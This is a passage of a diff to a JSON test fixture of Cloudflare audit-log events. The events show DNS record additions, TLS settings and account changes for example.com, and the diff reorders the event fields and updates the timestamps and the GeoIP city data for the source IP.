"original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"ea28df9c-e0bd-4a3d-b56e-3861ee1d1a8a\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"alt4.gmr-smtp-in.l.google.com\",\"id\":\"e80fa3d2167cfcaf172201e46c79c004\",\"name\":\"example.com\",\"priority\":40,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065339\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883448Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "ea28df9c-e0bd-4a3d-b56e-3861ee1d1a8a", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -2699,21 +2714,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776192282Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"ea28df9c-e0bd-4a3d-b56e-3861ee1d1a8a\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"alt4.gmr-smtp-in.l.google.com\",\"id\":\"e80fa3d2167cfcaf172201e46c79c004\",\"name\":\"example.com\",\"priority\":40,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065339\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883448Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "ea28df9c-e0bd-4a3d-b56e-3861ee1d1a8a", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -2741,14 +2741,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -2760,6 +2760,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389091945Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"5eea2e02-ae52-400c-855a-d48c92590133\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"alt3.gmr-smtp-in.l.google.com\",\"id\":\"5cf70e1b541a242428ece2af214889b2\",\"name\":\"example.com\",\"priority\":30,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065336\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883312Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "5eea2e02-ae52-400c-855a-d48c92590133", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -2787,21 +2802,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776194902Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"5eea2e02-ae52-400c-855a-d48c92590133\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"alt3.gmr-smtp-in.l.google.com\",\"id\":\"5cf70e1b541a242428ece2af214889b2\",\"name\":\"example.com\",\"priority\":30,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065336\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883312Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "5eea2e02-ae52-400c-855a-d48c92590133", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -2829,14 +2829,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -2848,6 +2848,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389092437Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"7fb1c2e8-01fc-4fbf-977d-04bf96780ed0\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"alt2.gmr-smtp-in.l.google.com\",\"id\":\"f83d5eb5f7f93c67d57e008d848ee3d1\",\"name\":\"example.com\",\"priority\":20,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065333\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883214Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "7fb1c2e8-01fc-4fbf-977d-04bf96780ed0", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -2875,21 +2890,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776197622Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"7fb1c2e8-01fc-4fbf-977d-04bf96780ed0\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"alt2.gmr-smtp-in.l.google.com\",\"id\":\"f83d5eb5f7f93c67d57e008d848ee3d1\",\"name\":\"example.com\",\"priority\":20,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065333\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883214Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "7fb1c2e8-01fc-4fbf-977d-04bf96780ed0", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -2917,14 +2917,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -2936,6 +2936,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389092852Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"90dc929c-2e08-4a79-85ff-7120db4900fd\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"alt1.gmr-smtp-in.l.google.com\",\"id\":\"c84049638d49a7569dcd2e29592f7f64\",\"name\":\"example.com\",\"priority\":10,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065330\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883111Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "90dc929c-2e08-4a79-85ff-7120db4900fd", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -2963,21 +2978,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776200244Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"90dc929c-2e08-4a79-85ff-7120db4900fd\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"alt1.gmr-smtp-in.l.google.com\",\"id\":\"c84049638d49a7569dcd2e29592f7f64\",\"name\":\"example.com\",\"priority\":10,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065330\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883111Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "90dc929c-2e08-4a79-85ff-7120db4900fd", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -3005,14 +3005,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -3024,6 +3024,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389093211Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"a9df3f63-7393-4d5f-b944-e26f14ff7004\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"gmr-smtp-in.l.google.com\",\"id\":\"0032abba95117ec00ea9e80443ec4328\",\"name\":\"example.com\",\"priority\":5,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065324\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883012Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "a9df3f63-7393-4d5f-b944-e26f14ff7004", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -3044,27 +3059,12 @@ "zone_name": "example.com", "id": "0032abba95117ec00ea9e80443ec4328", "proxied": false, - "priority": 5, - "type": "MX", - "ttl": 1, - "content": "gmr-smtp-in.l.google.com" - } - } - }, - "event": { - "ingested": "2021-12-13T14:40:20.776202851Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"a9df3f63-7393-4d5f-b944-e26f14ff7004\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"gmr-smtp-in.l.google.com\",\"id\":\"0032abba95117ec00ea9e80443ec4328\",\"name\":\"example.com\",\"priority\":5,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065324\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883012Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "a9df3f63-7393-4d5f-b944-e26f14ff7004", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" + "priority": 5, + "type": "MX", + "ttl": 1, + "content": "gmr-smtp-in.l.google.com" + } + } }, "user": { "email": "user@example.com", @@ -3093,14 +3093,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -3112,6 +3112,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389093582Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"56350016-6e66-4b42-9d33-decff087bb41\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"xClZppVPmuzSwaAIvasdffPmsr3hzfV0kd04M\",\"id\":\"6d1f29371601a520a621880746bfc754\",\"name\":\"_acme-challenge.example.com\",\"proxied\":false,\"ttl\":1,\"type\":\"TXT\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065321\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.882912Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "56350016-6e66-4b42-9d33-decff087bb41", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -3138,21 +3153,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776205498Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"56350016-6e66-4b42-9d33-decff087bb41\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"xClZppVPmuzSwaAIvasdffPmsr3hzfV0kd04M\",\"id\":\"6d1f29371601a520a621880746bfc754\",\"name\":\"_acme-challenge.example.com\",\"proxied\":false,\"ttl\":1,\"type\":\"TXT\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065321\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.882912Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "56350016-6e66-4b42-9d33-decff087bb41", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -3180,14 +3180,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -3199,6 +3199,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389094025Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"39f4f90b-60f4-4448-92b2-50b92a6cdce2\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"v=spf1 include:_spf.firebasemail.com ~all\",\"id\":\"5235557990af5ef6c7e5efa6a55cbb6a\",\"name\":\"example.com\",\"proxied\":false,\"ttl\":1,\"type\":\"TXT\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065318\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.882783Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "39f4f90b-60f4-4448-92b2-50b92a6cdce2", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -3225,21 +3240,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776208123Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"39f4f90b-60f4-4448-92b2-50b92a6cdce2\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"v=spf1 include:_spf.firebasemail.com ~all\",\"id\":\"5235557990af5ef6c7e5efa6a55cbb6a\",\"name\":\"example.com\",\"proxied\":false,\"ttl\":1,\"type\":\"TXT\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065318\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.882783Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "39f4f90b-60f4-4448-92b2-50b92a6cdce2", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -3267,14 +3267,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -3286,6 +3286,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389094395Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"6f53cfdd-79e2-4b11-9549-5701147985d8\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"firebase=frc-scout\",\"id\":\"920a5b813ec88edce032f0303684ec4b\",\"name\":\"example.com\",\"proxied\":false,\"ttl\":1,\"type\":\"TXT\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065315\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.882594Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "6f53cfdd-79e2-4b11-9549-5701147985d8", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -3312,21 +3327,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776210722Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"6f53cfdd-79e2-4b11-9549-5701147985d8\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"firebase=frc-scout\",\"id\":\"920a5b813ec88edce032f0303684ec4b\",\"name\":\"example.com\",\"proxied\":false,\"ttl\":1,\"type\":\"TXT\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065315\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.882594Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "6f53cfdd-79e2-4b11-9549-5701147985d8", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -3354,14 +3354,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -3373,6 +3373,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389094769Z", + "original": "{\"action\":{\"result\":true,\"type\":\"pending\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"e84686bd-25b7-5b1a-9ef0-a41346d9335a\",\"interface\":\"UI\",\"metadata\":{\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\",\"type\":\"account\"},\"when\":\"2021-08-09T10:14:10Z\"}", + "provider": "UI", + "kind": "event", + "action": "pending", + "id": "e84686bd-25b7-5b1a-9ef0-a41346d9335a", + "type": [ + "info" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -3391,21 +3406,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776213311Z", - "original": "{\"action\":{\"result\":true,\"type\":\"pending\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"e84686bd-25b7-5b1a-9ef0-a41346d9335a\",\"interface\":\"UI\",\"metadata\":{\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\",\"type\":\"account\"},\"when\":\"2021-08-09T10:14:10Z\"}", - "provider": "UI", - "kind": "event", - "action": "pending", - "id": "e84686bd-25b7-5b1a-9ef0-a41346d9335a", - "type": [ - "info" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -3428,7 +3428,7 @@ ] }, "event": { - "ingested": "2021-12-13T14:40:20.776216099Z", + "ingested": "2021-12-14T14:41:11.389095148Z", "original": "{\"action\":{\"result\":true,\"type\":\"tls_settings_deployed\"},\"actor\":{\"id\":\"1\",\"type\":\"system\"},\"id\":\"b657cc36-1919-4b4d-86f0-277bb05d479a\",\"interface\":\"\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"ciphers\":\"\",\"http_2\":\"Enabled\",\"min_tls_version\":\"TLSv1.0\",\"quic\":\"Default\",\"session_tickets\":\"Enabled\",\"tls_13\":\"Default\",\"zero_rtt\":\"Default\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"type\":\"zone\"},\"when\":\"2021-08-09T10:13:45.956041Z\"}", "kind": "event", "action": "tls_settings_deployed", @@ -3492,14 +3492,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -3511,6 +3511,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389095522Z", + "original": "{\"action\":{\"result\":true,\"type\":\"add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"0704d600-dcea-5f07-82b5-08aef2cf22fe\",\"interface\":\"UI\",\"metadata\":{\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\",\"type\":\"account\"},\"when\":\"2021-08-09T10:13:42Z\"}", + "provider": "UI", + "kind": "event", + "action": "add", + "id": "0704d600-dcea-5f07-82b5-08aef2cf22fe", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -3529,21 +3544,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776218846Z", - "original": "{\"action\":{\"result\":true,\"type\":\"add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"0704d600-dcea-5f07-82b5-08aef2cf22fe\",\"interface\":\"UI\",\"metadata\":{\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\",\"type\":\"account\"},\"when\":\"2021-08-09T10:13:42Z\"}", - "provider": "UI", - "kind": "event", - "action": "add", - "id": "0704d600-dcea-5f07-82b5-08aef2cf22fe", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -3571,14 +3571,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 